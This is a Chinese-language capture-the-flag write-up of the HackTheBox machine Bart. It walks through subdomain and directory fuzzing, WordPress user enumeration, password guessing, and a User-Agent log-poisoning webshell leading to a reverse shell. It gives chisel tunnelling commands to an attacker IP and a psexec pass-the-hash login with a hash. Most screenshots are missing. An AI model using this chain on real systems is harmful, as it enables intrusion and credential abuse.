Bart - HackTheBox
Td

image

nmap扫描

image

image

只有一个80端口,发现一个域名,添加到hosts文件

image

纯静态页面

image

image

这里发现一堆名字,和一个子域名,保存一下

image

将页面下载下来

image

保留名字

image

俩俩拆分同样保存

image

目录也没扫描出可利用信息,爆破一下子域名

gobuster vhost -u http://bart.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt

image

image

没有爆出来,换wfuzz

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ > host.txt

image

只筛选结果为301跳转的状态码

image

image

一个登录框

在前面下载index.html中获取到,站点由wordpress搭建

image

wordpress可以通过找回密码来判断用户名是否存在

image

利用之前保存的用户名去猜测存在的用户

image

最终得到Harvey用户存在,尝试将页面单词当作字典

cewl http://forum.bart.htb/ > pass.txt

image

但是该页面存在CSRF Token,爆破不了,手动尝试

最终结果为potter,他妈的居然是个小写

image

image

又一个子域名

image

又一个登录框

potter上不去了

扫一下这个域名的目录

image

image

扫描到了一个注册页面

image

但无法直接访问

image

通过搜索url关键字,获取到了github上的源码

https://github.com/magkopian/php-ajax-simple-chat

image

注册页面是由post提交用户名和密码即可,密码要求最少八位

image

image

image

xss不执行

image

抓取获取到该页面下有一个log.txt文件

image

这里貌似记录了请求信息

image

image

记录User-Agent头信息,这样是不是就可以写一个webshell进去

image

image

image

image

反弹个shell回来

image

提权

image

image

win10专业版64位系统,没有打补丁

image

权限不够

image

检测工具没有检测出可利用exp,换一个

image

发现一个账号密码,evil-winrm不能直接登录

image

image

这里开放了445,但扫描没有扫到,chisel映射一下

C:\Users\Public\chisel.exe client 10.10.14.12:6666 R:127.0.0.1:445:127.0.0.1:445

image

./chisel_1.8.1_linux_amd64 server --port 6666 --reverse

image

psexec.py登录

python psexec.py administrator:3130438f31186fbaf962f407711faddb@127.0.0.1

image

image